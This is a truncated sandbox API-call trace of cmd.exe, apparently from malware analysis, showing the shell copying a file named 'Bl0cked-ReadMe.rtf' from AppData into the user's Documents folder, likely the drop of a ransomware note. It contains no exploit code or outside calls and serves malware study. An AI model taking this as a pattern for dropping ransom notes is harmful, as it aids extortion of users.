(lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.684] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.684] GetCurrentThreadId () returned 0xb20 [0235.684] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb20) returned 0x38 [0235.684] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.685] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.685] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.685] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.685] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fc74 | out: phkResult=0x14fc74*=0x0) returned 0x2 [0235.685] VirtualQuery (in: lpAddress=0x14fcab, lpBuffer=0x14fc44, dwLength=0x1c | out: lpBuffer=0x14fc44*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.685] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fc44, dwLength=0x1c | out: lpBuffer=0x14fc44*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.685] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fc44, dwLength=0x1c | out: lpBuffer=0x14fc44*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.685] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fc44, dwLength=0x1c | out: lpBuffer=0x14fc44*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.685] VirtualQuery (in: 
lpAddress=0x150000, lpBuffer=0x14fc44, dwLength=0x1c | out: lpBuffer=0x14fc44*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.685] GetConsoleOutputCP () returned 0x1b5 [0235.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.685] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.685] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.685] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.685] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.686] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.686] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.686] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.686] GetEnvironmentStringsW () returned 0x1a0168* [0235.686] FreeEnvironmentStringsW (penv=0x1a0168) returned 1 [0235.686] GetEnvironmentStringsW () returned 0x1a0168* [0235.686] FreeEnvironmentStringsW (penv=0x1a0168) returned 1 [0235.687] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ebe4 | out: phkResult=0x14ebe4*=0x40) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x90, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: 
lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x1, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x1, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x0, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x40, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x40, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x40, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegCloseKey (hKey=0x40) returned 0x0 [0235.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ebe4 | out: phkResult=0x14ebe4*=0x40) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x40, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x1, lpcbData=0x14ebe8*=0x4) 
returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x1, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x0, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x9, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x4, lpData=0x14ebf0*=0x9, lpcbData=0x14ebe8*=0x4) returned 0x0 [0235.687] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ebec, lpData=0x14ebf0, lpcbData=0x14ebe8*=0x1000 | out: lpType=0x14ebec*=0x0, lpData=0x14ebf0*=0x9, lpcbData=0x14ebe8*=0x1000) returned 0x2 [0235.687] RegCloseKey (hKey=0x40) returned 0x0 [0235.687] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c3 [0235.687] srand (_Seed=0x5b8863c3) [0235.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0235.687] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0235.687] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.688] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a18c8, nSize=0x104 | out: 
lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.688] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.688] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.688] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.688] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.688] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.688] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.688] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.688] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.688] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.688] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.688] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.688] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.688] GetEnvironmentStringsW () returned 0x1a22b8* [0235.689] FreeEnvironmentStringsW (penv=0x1a22b8) returned 1 [0235.689] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.689] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.689] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.689] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.689] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.689] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 
[0235.689] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.689] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.689] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.689] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.689] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f9b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.689] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f9b0, lpFilePart=0x14f9ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f9ac*="Desktop") returned 0x18 [0235.689] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.689] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f72c | out: lpFindFileData=0x14f72c) returned 0x19fff8 [0235.689] FindClose (in: hFindFile=0x19fff8 | out: hFindFile=0x19fff8) returned 1 [0235.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f72c | out: lpFindFileData=0x14f72c) returned 0x19fff8 [0235.689] FindClose (in: hFindFile=0x19fff8 | out: hFindFile=0x19fff8) returned 1 [0235.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f72c | out: lpFindFileData=0x14f72c) returned 0x19fff8 [0235.690] FindClose (in: hFindFile=0x19fff8 | out: hFindFile=0x19fff8) returned 1 [0235.690] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.690] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.690] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.690] GetEnvironmentStringsW () returned 0x1a2ad8* [0235.690] FreeEnvironmentStringsW (penv=0x1a2ad8) returned 1 [0235.690] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.690] GetConsoleOutputCP () returned 0x1b5 [0235.690] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.690] GetUserDefaultLCID () returned 0x409 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14faf0, cchData=128 | out: lpLCData="0") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14faf0, cchData=128 | out: lpLCData="0") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14faf0, cchData=128 | out: lpLCData="1") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.691] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 
[0235.692] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.692] GetConsoleTitleW (in: lpConsoleTitle=0x1908d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.693] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.693] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.693] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.693] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.693] _wcsicmp (_String1="type", _String2=")") returned 75 [0235.693] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0235.693] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0235.693] _wcsicmp (_String1="IF", _String2="type") returned -11 [0235.693] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0235.693] _wcsicmp (_String1="REM", _String2="type") returned -2 [0235.693] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0235.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.697] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.697] GetFileType (hFile=0x7) returned 0x2 [0235.697] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.697] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f9e8 | out: lpMode=0x14f9e8) returned 1 [0235.698] _dup (_FileHandle=1) returned 3 [0235.698] _close (_FileHandle=1) returned 0 [0235.698] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0235.698] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x14f9b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0235.699] _open_osfhandle 
(_OSFileHandle=0x4c, _Flags=8) returned 1 [0235.699] GetConsoleTitleW (in: lpConsoleTitle=0x14f7e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.699] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0235.699] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0235.699] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0235.699] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0235.700] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.700] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x14f34c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f34c) returned 0x190e50 [0235.701] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0235.701] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0235.701] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0235.701] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e258, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0235.701] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0235.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.701] GetFileType (hFile=0x54) returned 0x1 [0235.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.701] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x14e2b0 | out: lpFileSizeHigh=0x14e2b0*=0x0) returned 0x1632 [0235.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.701] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | 
out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.701] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.701] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.701] GetFileType (hFile=0x4c) returned 0x1 [0235.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.701] GetFileType (hFile=0x4c) returned 0x1 [0235.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.702] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 
[0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] GetFileType (hFile=0x4c) returned 0x1 [0235.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.703] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.704] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesRead=0x14e2d8*=0x200, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0e8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f138*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f188*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f188*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f1d8*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f228*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f228*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14f278*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f278*, lpNumberOfBytesWritten=0x14e2cc*=0x50, lpOverlapped=0x0) returned 1 [0235.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.704] GetFileType (hFile=0x4c) returned 0x1 [0235.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14f2c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e2cc, lpOverlapped=0x0 | out: lpBuffer=0x14f2c8*, lpNumberOfBytesWritten=0x14e2cc*=0x20, lpOverlapped=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.705] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e2b8 | out: lpNewFilePointer=0x0) returned 1 [0235.705] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.705] ReadFile (in: hFile=0x54, lpBuffer=0x14f0e8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2d8, lpOverlapped=0x0 | out: lpBuffer=0x14f0e8*, 